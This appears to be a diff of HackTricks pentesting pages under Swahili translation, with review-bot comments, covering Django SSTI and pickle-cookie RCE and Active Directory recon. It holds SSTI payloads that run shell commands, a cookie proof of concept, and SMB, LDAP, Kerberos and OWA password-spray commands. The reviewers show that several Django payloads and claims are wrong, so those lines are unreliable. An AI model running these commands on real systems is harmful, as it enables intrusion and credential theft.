- 0xdf University HTB write-up (uukaji wa dunia halisi, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html)
|
||||
- Kuingia kwa NVD (mifano iliyoharibika): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733)
|
||||
- nyaraka za xhtml2pdf (dhana za markup/ukurasa): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
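Review bot: "Ikiwa exports zimekaa au zimepangwa" renders "cached or queued" as "have sat or been arranged"; use "zimehifadhiwa kwenye cache au ziko kwenye foleni". "wakati input haijatumika" means "when the input is unused" whereas the English is "untrusted" ("haiaminiki"). "miunganisho ya kutarajia kutoka nje" is garbled for "suspicious outbound connections" ("miunganisho ya kwenda nje yenye kutiliwa shaka"). In the references, "uukaji wa dunia halisi" is not a word ("exploitation ya hali halisi"), and "Kuingia kwa NVD (mifano iliyoharibika)" turns "NVD entry (affected versions)" into "damaged examples"; write "Ingizo la NVD (matoleo yaliyoathirika)".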
@ -3,9 +3,9 @@
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Cache Manipulation to RCE
|
||||
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **Ikiwa attacker anaweza kupata write access kwa cache, wataweza kuinua hitilafu hii hadi RCE kwenye server ya msingi**.
|
||||
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **Ikiwa mshambuliaji anaweza kupata ufikiaji wa kuandika kwenye cache, wanaweza kupanua udhaifu huu hadi RCE kwenye server ya msingi**.
|
||||
|
||||
Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache stored in a Redis server or database are the most likely attack vectors (Redis injection and SQL injection), but an attacker may also be able to use file-based cache to turn an arbitrary write into RCE. Watunzaji wameitaja hii kama non-issue. Ni muhimu kutambua kwamba folda ya faili za cache, jina la jedwali la SQL, na maelezo ya Redis server yatatofautiana kulingana na utekelezaji.
|
||||
Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache iliyohifadhiwa kwenye server ya Redis au database ndizo vigezo vya shambulio vinavyowezekana zaidi (Redis injection na SQL injection), lakini mshambuliaji anaweza pia kutumia cache ya aina ya file-based kugeuza uandishi wowote kuwa RCE. Watunzaji wametaja hili kuwa suala lisilo la wasiwasi. Ni muhimu kutambua kwamba folda ya cache file, jina la jedwali la SQL, na maelezo ya server ya Redis yatatofautiana kulingana na utekelezaji.
|
||||
|
||||
This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436
|
||||
|
||||
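Review bot: "vigezo vya shambulio" means attack parameters; "attack vectors" is "njia za shambulio". Both old and new lines also leave the first half of each paragraph in English ("Django's default cache storage method is...", "Django cache is stored in one of four places..."), so the paragraphs switch language mid-sentence; translate them in full. On content, Django also ships Memcached backends (`PyMemcacheCache`, `PyLibMCCache`) that pickle values too, so "one of four places" undercounts the backends an attacker should look for.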
@ -14,31 +14,31 @@ This HackerOne report provides a great, reproducible example of exploiting Djang
|
||||
## Server-Side Template Injection (SSTI)
|
||||
The Django Template Language (DTL) is **Turing-complete**. If user-supplied data is rendered as a *template string* (for example by calling `Template(user_input).render()` or when `|safe`/`format_html()` removes auto-escaping), an attacker may achieve full SSTI → RCE.
|
||||
|
||||
### Utambuzi
|
||||
1. Tafuta miito ya dinamik kwa `Template()` / `Engine.from_string()` / `render_to_string()` ambazo zinajumuisha *data yoyote* ya ombi isiyosafishwa.
|
||||
2. Tuma payload ya msingi wa muda au hisabati:
|
||||
### Detection
|
||||
1. Look for dynamic calls to `Template()` / `Engine.from_string()` / `render_to_string()` that include *any* unsanitised request data.
|
||||
2. Send a time-based or arithmetic payload:
|
||||
```django
|
||||
{{7*7}}
|
||||
```
|
||||
If the rendered output contains `49` the input is compiled by the template engine.
|
||||
|
||||
### Kigezo cha kufikia RCE
|
||||
### Primitive to RCE
|
||||
Django blocks direct access to `__import__`, but the Python object graph is reachable:
|
||||
```django
|
||||
{{''.__class__.mro()[1].__subclasses__()}}
|
||||
```
|
||||
Pata index ya `subprocess.Popen` (≈400–500 kulingana na ujenzi wa Python) na tekeleza amri zozote:
|
||||
Pata index ya `subprocess.Popen` (≈400–500, kutegemea build ya Python) na execute arbitrary commands:
|
||||
```django
|
||||
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
|
||||
```
|
||||
Gadget salama zaidi ya jumla ni kurudia mpaka `cls.__name__ == 'Popen'`.
|
||||
Gadget universal salama ni kurudia hadi `cls.__name__ == 'Popen'`.
|
||||
|
||||
Gadget hiyo hiyo inafanya kazi pia kwa vipengele vya uwasilishaji vya template vya **Debug Toolbar** au **Django-CMS** vinavyoshughulikia vibaya ingizo la mtumiaji.
|
||||
The same gadget works for **Debug Toolbar** or **Django-CMS** template rendering features that mishandle user input.
|
||||
|
||||
---
|
||||
|
||||
### Angalia pia: ReportLab/xhtml2pdf PDF export RCE
|
||||
Programu zinazojengwa juu ya Django kwa kawaida huingiza xhtml2pdf/ReportLab ili kutengeneza views kama PDF. Wakati HTML inayodhibitiwa na mtumiaji inaingia kwenye uzalishaji wa PDF, rl_safe_eval inaweza kutathmini expressions ndani ya mabano matatu `[[[ ... ]]]` ikiruhusu utekelezaji wa msimbo (CVE-2023-33733). Maelezo, payloads, na mbinu za kupunguza:
|
||||
Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets `[[[ ... ]]]` enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:
|
||||
|
||||
{{#ref}}
|
||||
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
|
||||
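Review bot: the payloads in this hunk do not work in the Django Template Language as claimed: DTL has no arithmetic, so `{{7*7}}` raises TemplateSyntaxError rather than rendering `49`; variable resolution refuses any segment beginning with an underscore, so `{{''.__class__.mro()[1].__subclasses__()}}` is rejected; and DTL cannot pass arguments to calls, so `__subclasses__()[438]('id',shell=True,...)` cannot be expressed. These are Jinja2 payloads, and "DTL is Turing-complete" is the opposite of the design (it is deliberately restricted). Separately, this hunk replaces already-translated lines ("### Utambuzi", "### Kigezo cha kufikia RCE", the Debug Toolbar/Django-CMS sentence, the xhtml2pdf paragraph) with their English originals, the reverse of what the commit is meant to do.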
@ -46,14 +46,14 @@ Programu zinazojengwa juu ya Django kwa kawaida huingiza xhtml2pdf/ReportLab ili
|
||||
|
||||
---
|
||||
|
||||
## Pickle-Backed Session Cookie RCE
|
||||
## RCE ya Session Cookie iliyotegemea Pickle
|
||||
If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution.
|
||||
|
||||
### Mahitaji ya Exploit
|
||||
* Seva inatumia `PickleSerializer`.
|
||||
* Server inatumia `PickleSerializer`.
|
||||
* Mshambuliaji anajua / anaweza kukisia `settings.SECRET_KEY` (leaks via GitHub, `.env`, error pages, etc.).
|
||||
|
||||
### Uthibitisho wa Dhana
|
||||
### Proof-of-Concept
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
from django.contrib.sessions.serializers import PickleSerializer
|
||||
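Review bot: `django.contrib.sessions.serializers.PickleSerializer` was deprecated in Django 4.1 and removed in 5.0, so the `SESSION_SERIALIZER` setting and the PoC's import only apply to Django 4.2 and earlier; say so next to "Mahitaji ya Exploit". Also "Django *decrypts and unpickles* the session cookie" is inaccurate: session cookies are signed, not encrypted, so "verifies the signature and unpickles" (Swahili: "inathibitisha saini na ku-unpickle"). The hunk also turns the Swahili heading "Uthibitisho wa Dhana" back into the English "Proof-of-Concept".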
@ -69,15 +69,15 @@ print(f"sessionid={mal}")
```
Tuma cookie iliyopatikana, na payload itaendeshwa kwa ruhusa za WSGI worker.

**Mikakati ya kupunguza hatari**: Endelea kutumia default `JSONSerializer`, badilisha `SECRET_KEY` mara kwa mara, na sanidi `SESSION_COOKIE_HTTPONLY`.
**Mitigations**: Tumia `JSONSerializer` ya default, badilisha `SECRET_KEY` mara kwa mara, na sanidi `SESSION_COOKIE_HTTPONLY`.

---

## CVE za Django Zenye Athari Kubwa (2023-2025) Zinazopaswa Kukaguliwa na Pentesters
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (ilirekebishwa 4 Jun 2025). Inaruhusu washambuliaji kuingiza newlines/ANSI codes ndani ya faili za log na kuharibu uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Unda JSON keys ili kuvunja quoting na kutekeleza SQL yoyote. Imerekebishwa katika 4.2.15 / 5.0.8.
## CVE za Django za Matokeo Makubwa (2023-2025) Pentesters Wanazopaswa Kukagua
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Inaruhusu mashambulizi kusafirisha newlines/ANSI codes ndani ya faili za log na kuchafua uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Unda funguo za JSON ili kuvunja quoting na kutekeleza SQL yoyote. Fixed in 4.2.15 / 5.0.8.

Daima tambua toleo halisi la framework kupitia ukurasa wa kosa wa `X-Frame-Options` au hash ya `/static/admin/css/base.css` na jaribu vipengele hapo juu pale inapofaa.
Daima tambua (fingerprint) toleo halisi la framework kupitia ukurasa wa kosa wa `X-Frame-Options` au hash ya `/static/admin/css/base.css` na jaribu vipengele vilivyotajwa hapo juu pale inapofaa.

---
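Review bot: in the new CVE-2025-48432 bullet "attackers" comes out as "mashambulizi" (attacks) where the replaced line had "washambuliaji", and both new CVE bullets leave "fixed June 4 2025" and "Fixed in 4.2.15 / 5.0.8" in English although the surrounding text is Swahili; keep "washambuliaji" and the replaced lines' "ilirekebishwa 4 Jun 2025" / "Imerekebishwa katika 4.2.15 / 5.0.8". On the Mitigations line, since the requirements above name `PickleSerializer` as the precondition, it would help to say that keeping the default `JSONSerializer` is what removes the issue, while rotating `SECRET_KEY` and setting `SESSION_COOKIE_HTTPONLY` only narrow the exposure.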
@ -4,26 +4,26 @@

## Muhtasari wa Msingi

**Active Directory** ni teknolojia ya msingi inayomruhusu **wasimamizi wa mtandao** kuunda na kusimamia kwa ufanisi **domains**, **users**, na **objects** ndani ya mtandao. Imetengenezwa ili kustahimili ukuaji, ikiruhusu kupanga idadi kubwa ya watumiaji katika **groups** na **subgroups** zinazoweza kusimamiwa, huku ikidhibiti **access rights** kwa ngazi mbalimbali.
**Active Directory** ni teknolojia ya msingi, inayowezesha **network administrators** kuunda na kusimamia kwa ufanisi **domains**, **users**, na **objects** ndani ya mtandao. Imetengenezwa ili iweze kupanuka, ikisaidia kupanga idadi kubwa ya watumiaji katika **groups** na **subgroups** zinazoweza kudhibitiwa, sambamba na kudhibiti **access rights** kwa ngazi mbalimbali.

Muundo wa **Active Directory** una tabaka kuu tatu: **domains**, **trees**, na **forests**. **Domain** inajumuisha mkusanyiko wa objects, kama **users** au **devices**, wanaoshiriki database ya pamoja. **Trees** ni vikundi vya domains vinavyounganishwa kwa muundo wa pamoja, na **forest** ni mkusanyiko wa miti kadhaa zinazohusishwa kupitia **trust relationships**, zikifanya safu ya juu kabisa ya muundo wa shirika. Haki maalum za **access** na **communication** zinaweza kuwekwa katika kila moja ya ngazi hizi.
Muundo wa **Active Directory** unajumuisha tabaka tatu kuu: **domains**, **trees**, na **forests**. **Domain** ni mkusanyiko wa objects, kama **users** au **devices**, zinazoshiriki database moja. **Trees** ni makundi ya domains haya yaliyounganishwa na muundo wa pamoja, na **forest** ni mkusanyiko wa trees nyingi, zilizounganishwa kupitia **trust relationships**, zikounda tabaka la juu kabisa la muundo wa shirika. Haki maalum za **access** na **communication** zinaweza kutengwa katika kila moja ya ngazi hizi.

Madhumuni muhimu ndani ya **Active Directory** ni:
Dhana muhimu ndani ya **Active Directory** ni pamoja na:

1. **Directory** – Inahifadhi taarifa zote zinazohusu Active Directory objects.
2. **Object** – Inaonyesha kiumbe ndani ya directory, ikijumuisha **users**, **groups**, au **shared folders**.
3. **Domain** – Inafanya kazi kama kontena la directory objects, na inawezekana kwa domains nyingi kuishi ndani ya **forest**, kila moja ikiwa na mkusanyiko wake wa objects.
4. **Tree** – Kikundi cha domains kinachoshiriki root domain moja.
5. **Forest** – Safu ya juu kabisa ya muundo wa shirika katika Active Directory, inayojumuisha miti kadhaa zikiwa na **trust relationships** baina yao.
1. **Directory** – Ina taarifa zote zinazohusiana na Active Directory objects.
2. **Object** – Inaonyesha vitu ndani ya directory, ikiwa ni pamoja na **users**, **groups**, au **shared folders**.
3. **Domain** – Hutoa chombo cha kuhifadhia directory objects, na inawezekana kuwa na domains nyingi ndani ya **forest**, kila moja ikiweka mkusanyiko wake wa objects.
4. **Tree** – Makundi ya domains yanayoshiriki domain mzazi.
5. **Forest** – Juu zaidi ya muundo wa shirika katika Active Directory, inayojumuisha trees kadhaa zenye **trust relationships** kati yao.

**Active Directory Domain Services (AD DS)** inajumuisha huduma mbalimbali muhimu kwa usimamizi wa katikati na mawasiliano ndani ya mtandao. Huduma hizi ni pamoja na:
**Active Directory Domain Services (AD DS)** inajumuisha huduma mbalimbali muhimu kwa usimamizi wa kati na mawasiliano ndani ya mtandao. Huduma hizi ni pamoja na:

1. **Domain Services** – Inakusanya data kwa sehemu moja na kusimamia mwingiliano kati ya **users** na **domains**, ikiwa ni pamoja na **authentication** na **search**.
2. **Certificate Services** – Inasimamia uundaji, ugawaji, na usimamizi wa **digital certificates** salama.
3. **Lightweight Directory Services** – Inaunga mkono programu zilizo na directory kwa kupitia **LDAP protocol**.
4. **Directory Federation Services** – Inatoa uwezo wa **single-sign-on** kuthibitisha watumiaji kwenye web applications mbalimbali kwa kikao kimoja.
5. **Rights Management** – Inasaidia kulinda nyenzo za hakimiliki kwa kudhibiti usambazaji na matumizi yasiyoidhinishwa.
6. **DNS Service** – Huduma muhimu kwa kutatua **domain names**.
1. **Domain Services** – Inaleta uhifadhi wa data kwa njia ya kati na kusimamia mwingiliano kati ya **users** na **domains**, ikijumuisha **authentication** na uwezo wa **search**.
2. **Certificate Services** – Inasimamia utengenezaji, usambazaji, na usimamizi wa **digital certificates** salama.
3. **Lightweight Directory Services** – Inasaidia programu zilizo na directory kupitia **LDAP protocol**.
4. **Directory Federation Services** – Inatoa uwezo wa **single-sign-on** ili kuthibitisha watumiaji kwenye web applications nyingi kwa kikao kimoja.
5. **Rights Management** – Inasaidia kulinda vifaa vya hakimiliki kwa kudhibiti usambazaji na matumizi yasiyoidhinishwa.
6. **DNS Service** – Muhimu kwa kutatua **domain names**.

Kwa maelezo zaidi angalia: [**TechTerms - Active Directory Definition**](https://techterms.com/definition/active_directory)
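Review bot: item 4 (**Tree**) in the new concept list turns "root domain moja" into "domain mzazi" (parent domain), which changes the meaning; the replaced line says the domains in a tree share one root domain, so keep "root domain". In the new structure paragraph "zikounda" should be "zikiunda".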
@ -34,25 +34,25 @@ Ili kujifunza jinsi ya **attack an AD** unahitaji kuelewa vizuri mchakato wa **K

## Cheat Sheet

Unaweza kuangalia mengi kwenye [https://wadcoms.github.io/](https://wadcoms.github.io) ili kupata muhtasari wa haraka wa amri ambazo unaweza kutekeleza ku-enumerate/exploit AD.
Unaweza kuchukua mengi kwenye [https://wadcoms.github.io/](https://wadcoms.github.io) ili kupata muhtasari wa haraka wa amri ambazo unaweza kuendesha ku-enumerate/exploit AD.

> [!WARNING]
> Kerberos communication **requires a full qualifid name (FQDN)** kwa kufanya vitendo. Ukijaribu kufikia mashine kwa anwani ya IP, **it'll use NTLM and not kerberos**.
> Kerberos communication **requires a full qualifid name (FQDN)** for performing actions. If you try to access a machine by the IP address, **it'll use NTLM and not kerberos**.

## Recon Active Directory (No creds/sessions)

Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:
Ikiwa unaweza tu kupata ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:

- **Pentest the network:**
- Piga skani mtandao, pata mashine na port zilizo wazi na jaribu **exploit vulnerabilities** au **extract credentials** kutoka kwao (kwa mfano, [printers could be very interesting targets](ad-information-in-printers.md)).
- Ku-orodha DNS kunaweza kutoa taarifa kuhusu server muhimu ndani ya domain kama web, printers, shares, vpn, media, n.k.
- Scan the network, pata machines na ports zilizo wazi na jaribu **exploit vulnerabilities** au **extract credentials** kutoka kwao (kwa mfano, [printers could be very interesting targets](ad-information-in-printers.md).
- Enumerating DNS inaweza kutoa taarifa kuhusu servers muhimu ndani ya domain kama web, printers, shares, vpn, media, n.k.
- `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
- Angalia [**Pentesting Methodology**](../../generic-methodologies-and-resources/pentesting-methodology.md) kwa maelezo zaidi juu ya jinsi ya kufanya haya.
- **Check for null and Guest access on smb services** (hii haitafanya kazi kwenye version za kisasa za Windows):
- Angalia [**Pentesting Methodology**](../../generic-methodologies-and-resources/pentesting-methodology.md) kwa maelezo zaidi kuhusu jinsi ya kufanya hili.
- **Check for null and Guest access on smb services** (hii haitafanya kazi kwenye toleo za kisasa za Windows):
- `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
- `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
- `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
- Mwongozo wa kina juu ya jinsi ya ku-enumerate SMB server unaweza kupatikana hapa:
- Mwongozo wa kina kuhusu jinsi ya ku-enumerate SMB server unaweza kupatikana hapa:


{{#ref}}
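Review bot: the new WARNING line swaps a Swahili sentence for the untranslated English one, and both versions keep the typo "qualifid" (qualified); restore the Swahili wording with the spelling fixed. Further down, the new "Scan the network" bullet loses the closing parenthesis after the printers link (the replaced line ended `targets](ad-information-in-printers.md)).`), and the third SMB command `smbclient -U 'guest%' -L //` has no `<DC IP>` after `//`, unlike the two commands above it.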
@ -61,7 +61,7 @@ Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:

- **Enumerate Ldap**
- `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
- Mwongozo wa kina juu ya jinsi ya ku-enumerate LDAP unaweza kupatikana hapa (lipa **special attention to the anonymous access**):
- Mwongozo wa kina kuhusu jinsi ya ku-enumerate LDAP unaweza kupatikana hapa (lipa **special attention to the anonymous access**):


{{#ref}}
@ -70,20 +70,20 @@ Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:

- **Poison the network**
- Kusanya credentials kwa **impersonating services with Responder** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
- Pata ufikiaji wa host kwa **abusing the relay attack** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
- Kusanya credentials kwa **exposing fake UPnP services with evil-S** (../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
- Patia host ufikiaji kwa **abusing the relay attack** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
- Kusanya credentials kwa **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html):
- Chota usernames/majina kutoka kwa nyaraka za ndani, mitandao ya kijamii, huduma (hasa web) ndani ya mazingira ya domain na pia zile zilizopo hadharani.
- Ukipata majina kamili ya wafanyakazi wa kampuni, unaweza kujaribu aina tofauti za AD **username conventions** ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). Mienendo ya kawaida ni: _NameSurname_, _Name.Surname_, _NamSur_ (herufi 3 za kila moja), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, herufi 3 _random_ na namba 3 _random_ (abc123).
- Zana:
- Choma usernames/majina kutoka kwa nyaraka za ndani, mitandao ya kijamii, huduma (hasa web) ndani ya mazingira ya domain na pia kutoka kwa yaliyopo hadharani.
- Ikiwa utapata majina kamili ya wafanyakazi wa kampuni, unaweza kujaribu kanuni mbalimbali za AD **username conventions** ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). Kanuni zinazoenea zaidi ni: _NameSurname_, _Name.Surname_, _NamSur_ (herufi 3 za kila jina), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, herufi 3 _random_ na namba 3 _random_ (abc123).
- Tools:
- [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
- [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)

### Uorodheshaji wa watumiaji
### User enumeration

- **Anonymous SMB/LDAP enum:** Angalia kurasa za [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/index.html) na [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md).
- **Kerbrute enum**: Wakati **invalid username is requested** server itajibu kwa kutumia msimbo wa hitilafu wa **Kerberos** _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, ikituruhusu kubaini kuwa username ilikuwa batili. **Valid usernames** zitatokea kwa AS-REP yenye **TGT** au hitilafu _KRB5KDC_ERR_PREAUTH_REQUIRED_, ikionyesha kuwa mtumiaji anahitajika kufanya pre-authentication.
- **No Authentication against MS-NRPC**: Kutumia auth-level = 1 (No authentication) dhidi ya kiolesura cha MS-NRPC (Netlogon) kwenye domain controllers. Mbinu inaita function `DsrGetDcNameEx2` baada ya kufunga MS-NRPC interface ili kukagua kama user au computer ipo bila credentials. Zana ya [NauthNRPC](https://github.com/sud0Ru/NauthNRPC) inatekeleza aina hii ya enumeration. Utafiti unaweza kupatikana [hapa](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)
- **Kerbrute enum**: Wakati **invalid username is requested** server itajibu kwa kutumia **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, ikitupa nafasi ya kubaini kuwa username ilikuwa batili. **Valid usernames** zitapokea au TGT katika majibu ya **AS-REP** au error _KRB5KDC_ERR_PREAUTH_REQUIRED_, ikionyesha kuwa mtumiaji anaombiwa kufanya pre-authentication.
- **No Authentication against MS-NRPC**: Kutumia auth-level = 1 (No authentication) dhidi ya kiolesura cha MS-NRPC (Netlogon) kwenye domain controllers. Mbinu hii inaita function ya `DsrGetDcNameEx2` baada ya kubind MS-NRPC interface ili kukagua kama user au computer ipo bila credentials yoyote. Chombo cha [NauthNRPC](https://github.com/sud0Ru/NauthNRPC) kinatekeleza aina hii ya enumeration. Utafiti unaweza kupatikana [here](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)
```bash
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
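Review bot: the evil-SSDP bullet is still broken in the new line: the link text "fake UPnP services with evil-S" is truncated and the trailing `[**SDP**](https://medium.com/...)` sends the reader to an unrelated printer write-up, so the link should read "fake UPnP services with evil-SSDP" pointing at spoofing-ssdp-and-upnp-devices.md, with the medium article either dropped or given its own sentence. The relay bullet above it still has its path in bare parentheses instead of a markdown link. In the OSINT bullet "Choma usernames" means "burn the usernames"; the replaced line's "Chota" (scrape) was correct.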
@ -97,7 +97,7 @@ python3 nauth.py -t target -u users_file.txt #From https://github.com/sud0Ru/Nau
```
- **OWA (Outlook Web Access) Server**

Ikiwa umepata moja ya server hizi kwenye mtandao, unaweza pia kufanya **user enumeration against it**. Kwa mfano, unaweza kutumia zana [**MailSniper**](https://github.com/dafthack/MailSniper):
Ikiwa umepata moja ya seva hizi kwenye mtandao unaweza pia kufanya **user enumeration dhidi yake**. Kwa mfano, unaweza kutumia zana [**MailSniper**](https://github.com/dafthack/MailSniper):
```bash
ipmo C:\Tools\MailSniper\MailSniper.ps1
# Get info about the domain
@ -110,17 +110,17 @@ Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summe
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
```
> [!WARNING]
> Unaweza kupata orodha za majina ya watumiaji katika [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) na hii ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
> Unaweza kupata orodha za majina ya watumiaji kwenye [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) na hii ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
>
> Hata hivyo, unapaswa kuwa na **majina ya watu wanaofanya kazi kampuni** kutoka hatua ya recon uliopaswa kufanya kabla ya hii. Ukiwa na jina la kwanza na la mwisho unaweza kutumia script ya [**namemash.py**](https://gist.github.com/superkojiman/11076951) kuunda majina ya watumiaji yanayowezekana ya halali.
> Hata hivyo, unapaswa kuwa na **majina ya watu wanaofanya kazi katika kampuni** kutoka hatua ya recon uliyopaswa kuwa umefanya kabla. Kwa jina na jina la ukoo unaweza kutumia script [**namemash.py**](https://gist.github.com/superkojiman/11076951) kuzalisha majina ya watumiaji yanayoweza kuwa halali.

### Kujua jina la mtumiaji mmoja au kadhaa
### Knowing one or several usernames

Sawa, kwa hiyo unajua tayari una jina la mtumiaji halali lakini hakuna nywila... Kisha jaribu:
Sawa, kwa hivyo unajua tayari una jina la mtumiaji halali lakini hakuna nywila... Kisha jaribu:

- [**ASREPRoast**](asreproast.md): Ikiwa mtumiaji **hana** sifa ya _DONT_REQ_PREAUTH_ unaweza **kuomba ujumbe wa AS_REP** kwa mtumiaji huyo ambao utaweka data iliyosenywa kwa mabadiliko ya nywila ya mtumiaji.
- [**Password Spraying**](password-spraying.md): Tujaribu nywila za **kawaida zaidi** kwa kila mtumiaji uliyekutwa, labda baadhi ya watumiaji wanatumia nywila mbaya (kumbuka sera ya nywila!).
- Kumbuka kwamba pia unaweza **kuspray OWA servers** ili kujaribu kupata ufikiaji wa server za barua za watumiaji.
- [**ASREPRoast**](asreproast.md): Ikiwa mtumiaji **haina** sifa _DONT_REQ_PREAUTH_ unaweza **kuomba ujumbe AS_REP** kwa mtumiaji huyo ambao utakuwa na baadhi ya data iliyosimbwa kwa utengenezaji wa nywila ya mtumiaji.
- [**Password Spraying**](password-spraying.md): Jaribu nywila zinazotumika zaidi kwa kila mmoja wa watumiaji uliogundua, labda mtumiaji mwingine anatumia nywila mbaya (kumbuka sera ya nywila!).
- Kumbuka kwamba pia unaweza **spray OWA servers** ili kujaribu kupata ufikiaji wa seva za barua za watumiaji.


{{#ref}}
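Review bot: the new ASREPRoast bullet says "mtumiaji haina", which is the wrong class agreement for a person (the replaced line's "hana" was right), and renders "derivation of the user's password" as "utengenezaji wa nywila" (manufacture of the password); "kitokanacho na nywila ya mtumiaji" would keep the meaning. The new Password Spraying bullet also narrows the replaced line's "baadhi ya watumiaji" (some users) to "mtumiaji mwingine" (another user).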
@ -129,7 +129,7 @@ password-spraying.md

### LLMNR/NBT-NS Poisoning

Unaweza kupata baadhi ya challenge hashes za kukatwaza kwa ku-poison baadhi ya protocols za network:
Unaweza kupata baadhi ya challenge **hashes** za ku-crack kwa kufanya **poisoning** kwa baadhi ya protokoli za **network**:


{{#ref}}
@ -138,76 +138,76 @@ Unaweza kupata baadhi ya challenge hashes za kukatwaza kwa ku-poison baadhi ya p

### NTLM Relay

